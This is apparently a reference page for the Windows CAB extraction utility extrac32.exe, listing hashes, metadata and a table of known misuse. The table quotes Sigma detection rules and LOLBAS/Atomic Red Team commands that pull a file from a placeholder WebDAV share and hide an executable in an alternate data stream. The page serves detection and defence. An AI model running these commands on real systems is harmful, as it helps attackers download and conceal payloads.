extrac32.exe

File Path: C:\windows\SysWOW64\extrac32.exe
Description: Microsoft CAB File Extract Utility

Hashes

Type	Hash
MD5	`9A2112C578A445FE5E525361ED6FB0DB`
SHA1	`2283CEA233C697B19BEB68F5C7117E7EA9BA549D`
SHA256	`8E0E651A59FDF07F2161D2578BAA97BA6DE8B624F4AB9A17D3C633F4A060B522`
SHA384	`F1AEC56F7218C86DD1C6E01621871001CA32C2170AEE831B740A39C8CA5FB3CC5F91779186B5834688A7611C9E76C56C`
SHA512	`D55406645D9F70A331B351C3FCD7722B7BBC911297ADEB7620AB820BF027A757B7D39B748C4E592DD1E5BCC5A773BDBC59B2F49CC7740CEA92F7EA459184F23D`
SSDEEP	`768:QYD4e6vK84jRXBvKSSrccAQ6MhYQsq/a337v9lC6zW:QO4eqD4FRvKiK6MOQ2bC6K`

Signature

Status: The file C:\windows\SysWOW64\extrac32.exe is not digitally signed. You cannot run this script on the current system. For more information about running scripts and setting execution policy, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170
Serial: ``
Thumbprint: ``
Issuer:
Subject:

File Metadata

Original Filename: extrac32.exe.mui
Product Name: Microsoft Windows Operating System
Company Name: Microsoft Corporation
File Version: 6.3.9600.16384 (winblue_rtm.130821-1623)
Product Version: 6.3.9600.16384
Language: English (United States)
Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table contains possible examples of extrac32.exe being misused. While extrac32.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source	Source File	Example	License
sigma	proc_creation_win_lolbas_extrac32.yml	`title: Suspicious Extrac32 Execution`	DRL 1.0
sigma	proc_creation_win_lolbas_extrac32.yml	`description: Download or Copy file with Extrac32`	DRL 1.0
sigma	proc_creation_win_lolbas_extrac32.yml	`- https://lolbas-project.github.io/lolbas/Binaries/Extrac32/`	DRL 1.0
sigma	proc_creation_win_lolbas_extrac32.yml	`- extrac32.exe`	DRL 1.0
sigma	proc_creation_win_lolbas_extrac32_ads.yml	`title: Suspicious Extrac32 Alternate Data Stream Execution`	DRL 1.0
sigma	proc_creation_win_lolbas_extrac32_ads.yml	`- https://lolbas-project.github.io/lolbas/Binaries/Extrac32/`	DRL 1.0
sigma	proc_creation_win_lolbas_extrac32_ads.yml	`- extrac32.exe`	DRL 1.0
LOLBAS	Extrac32.yml	`Name: Extrac32.exe`
LOLBAS	Extrac32.yml	`- Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe`
LOLBAS	Extrac32.yml	`- Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe`
LOLBAS	Extrac32.yml	`- Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt`
LOLBAS	Extrac32.yml	`- Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe`
LOLBAS	Extrac32.yml	`- Path: C:\Windows\System32\extrac32.exe`
LOLBAS	Extrac32.yml	`- Path: C:\Windows\SysWOW64\extrac32.exe`
atomic-red-team	T1564.004.md	extrac32 #{path}\procexp.cab #{path}\file.txt:procexp.exe	MIT License. © 2018 Red Canary

MIT License. Copyright (c) 2020-2021 Strontic.